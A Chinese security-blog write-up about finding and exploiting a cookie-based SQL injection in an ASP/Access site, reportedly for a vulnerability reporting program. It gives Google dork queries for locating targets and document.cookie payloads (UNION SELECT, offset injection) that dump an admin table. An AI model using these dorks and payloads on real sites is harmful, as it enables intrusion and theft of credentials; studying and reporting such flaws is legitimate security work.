freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

记录一次公益SRC常见的cookie注入漏洞
掌控安全EDU 2025-01-23 14:30:44 68573
所属地 海外

谷歌语法-信息收集

1.查找带有ID传参的网站(可以查找sql注入漏洞)

inurl:asp id=xx

2.查找网站后台(多数有登陆框,可以查找弱口令,暴力破解等漏洞)

site:[http://xxxx.com](http://xxxx.com/) “admin”
site:[http://xx.com](http://xx.com/) intext:管理
site:[http://xx.com](http://xx.com/) inurl:login
site:[http://xx.com](http://xx.com/) intitle:后台

3.查看上传漏洞

site:[http://xx.com](http://xx.com/) inurl:file
site:[http://xx.com](http://xx.com/) inurl:load

4.查找敏感文件

filetype:mdb|doc|xlsx|pdf

cookie注入

1、cookie注入:

cookie相当于访问者的身份证,后端php代码中的$_REQUEST[]来获取你的cookie,网站会获取Cookie传参然后和原有的SQL语句拼接再传入数据库,传入了数据库这样我们就有机可乘了,我们可以修改cookie值进入数据库中进行sql注入。
Cookie注入在ASP网站中和低版本php中才会有,ASP常用的数据库是Accsess。

2、Access数据库:

access有强大的数据处理、统计分析能力,利用access的查询功能,可以方便地进行各类汇总、平均等统计,并且access数据库无库名。
access数据库在查询语句时和mysql不同,access比较严谨, 所以要select 字段 from 表名。
函数exists(select*from 表名)可以验证这个表名是否存在,这个表名还可以用burp来爆破。

3、怎样修改cookie: 用burp抓包改 用插件改(需要自己编码一下) 阅览器自带js进行设置(document.cookie=’id=’+escape(“代码”))

实战演示

信息收集

通过谷歌语法查找带有asp文件下的id传参,发现有很多带有id=1传参的网站,可以挨个试一试,id传参数可以任意修改。 发现一家id=104的网站 img

SQL注入判断

废话不多说直接判断是否存在sql注入,and 1=2发现网站报错,但是1=1页面显示正常,说明存在sql注入

document.cookie='id='+escape("104 and 1=1")document.cookie='id='+escape("104 and 1=2")

img

img

查找字段数

直接查找一下字段数,发现字段数为10

document.cookie='id='+escape("104 order by 10")

img

爆破表名

因为这是一个ACCESS数据库,没有库名,所以我们可以使用burp爆破出表名,这里就不给大家展示了。

document.cookie='id='+escape("104 union select 1,2,3,4,5,6,7,8,9,10 from admin")

img发现存在admin表,且回显点是2和5

img

输出结果

使用偏移注入查看admin表的字段数并且把表里的内容显示出来

document.cookie='id='+escape("104 union select 1,2,3,4,5,6,7,admin.* from admin")document.cookie='id='+escape("104 union select 1,2,3,admin.*,7,8,9,10 from admin")

img

img

总结

1.谷歌语法找到注入点

2.判断注入是否存在

3.通过cookie绕过注入

4.爆破表名

5.偏移注入查找表的字段数

6.最后可以通过爆破目录查找登陆框,进入后台进一步渗透拿权限

本文作者:Track-小博

# 渗透测试 # 黑客 # web安全 # 漏洞分析 # CTF
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 掌控安全EDU 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
掌控安全EDU LV.6
这家伙太懒了,还未填写个人描述!
  • 67 文章数
  • 66 关注者
掌控安全学院“零基础 3 天黑客训练营”开营啦
2025-02-26
APP测试0基础——APP加解密对抗
2025-02-26
封神台新上线漏洞复现靶场:前端加解密对抗
2025-02-26
文章目录